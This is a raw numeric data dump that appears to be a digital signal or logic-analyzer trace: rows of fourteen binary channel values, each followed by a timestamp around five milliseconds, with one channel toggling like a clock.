0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0189240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0189480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0189720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0189960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0190240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0190480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0190760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0191000e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0191240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0191480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0191720e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0191960e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0192240e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0192480e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0192760e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0193080e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0193320e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0193560e-03 0,1,1,0,1,0,0,0,0,0,0,0,1,0,5.0193800e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,0,5.0194040e-03 0,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1443920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1445920e-03 1,1,1,0,1,0,0,0,0,0,0,1,0,1,5.1446200e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1446480e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1449160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1449400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1449640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1449920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1450160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1450440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1450680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1450920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1451160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1451400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1451640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.1451920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,1,5.1452160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1452280e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1452400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1452680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1452920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1453160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1453400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1453640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1453920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1454160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1454440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1454680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1454920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1455160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1455400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1455640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1455920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1456160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1456400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1456680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1456920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1457160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1457400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1457640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1457880e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1458160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1458440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1458680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1458920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1459160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1459400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1459640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1459920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1460160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1460440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1460680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1460920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1461160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1461400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1461640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1461920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1462440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1462680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1462920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1463160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1463640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1463920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1464440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1464680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1465160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1465400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1465920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1466160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1466680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1466920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1467400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1467640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1467920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1468160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1468400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1468680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1468920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1469160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1469400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1469640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1469880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1470160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1470440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1470680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1470920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1471160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1471400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1471640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1472160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1472440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1472680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1472920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1473160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1473400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1473640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1473920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1474160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1474400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1474680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1474920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1475160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1475400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1475640e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1475880e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1476160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1476440e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1476680e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1476920e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1477160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1477400e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1477920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1478160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1478440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1478680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1478920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1479160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1479400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1479640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1479920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1480160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1480400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1480680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1480920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1481160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1481400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1481640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1481880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1482160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1482400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1482680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1482920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1483160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1483400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1483640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1483920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1484160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1484440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1484680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1484920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1485160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1485400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1485640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1485920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1486160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1486400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1486680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1486920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1487160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1487400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1487640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1487880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1488160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1488440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1488680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1488920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1489160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1489400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1489640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1489920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1490160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1490440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1490680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1490920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1491160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1491400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1491640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1491920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1492160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1492400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1492680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1492920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1493160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1493400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1493640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1493880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1494160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1494440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1494680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1494920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1495160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1495400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1495640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1495920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1496160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1496440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1496680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1496920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1497160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1497400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1497640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1497920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1498160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1498400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1498680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1498920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1499160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1499400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1499640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1499920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1500160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1500440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1500680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1500920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1501160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1501400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1501640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1501920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1502160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1502440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1502680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1502920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1503160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1503400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1503640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1503920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1504160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1504440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1504680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1504920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1505160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1505400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1505640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1505880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1506160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1506440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1506680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1506920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1507160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1507400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1507640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1507920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1508160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1508440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1508680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1508920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1509160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1509400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1509640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1509920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1510160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1510400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1510680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1510920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1511160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1511400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1511640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1511880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1512160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1512440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1512680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1512920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1513160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1513400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1513640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1513920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1514160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1514440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1514680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,5.1514920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,5.1515160e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,5.2762960e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,5.2764920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2765120e-03 0,0,0,1,1,0,0,0,0,0,0,1,0,1,5.2765400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2765640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2768640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2768920e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2769160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2769360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2769600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2769840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2770080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2770360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2770600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.2770840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,5.2771080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2771320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2771600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2771840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2772080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2772360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2772600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2772840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2773080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2773320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2773560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2773840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2774120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2774360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2774600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2774840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2775080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2775320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2775560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2775840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2776080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2776360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2776600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2776840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2777080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2777320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2777560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2777840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2778080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2778360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2778600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2778840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2779080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2779320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2779560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2779840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2780080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2780360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2780600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2780840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2781080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2781320e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2781400e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2781840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2782120e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,5.2782160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2782200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2782360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2782600e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2782640e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2782840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2783080e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2783320e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2783560e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2783840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2784080e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2784360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2784600e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2784840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2785080e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2785600e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2785840e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,5.2785880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2785920e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2786120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2786360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2786600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2786840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2787080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2787320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2787560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2787840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2788080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2788360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2788600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2788840e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2789080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2789320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2789560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2789840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2789880e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2790360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2790600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2790680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2790840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2791080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2791320e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2791560e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2791840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2792080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2792360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2792600e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2792840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2793080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2793320e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2793560e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2793800e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2794080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2794360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2794600e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2794840e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2795080e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2795600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2795840e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2795880e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,5.2796360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,5.2796600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,5.2796680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,5.2796840e-03 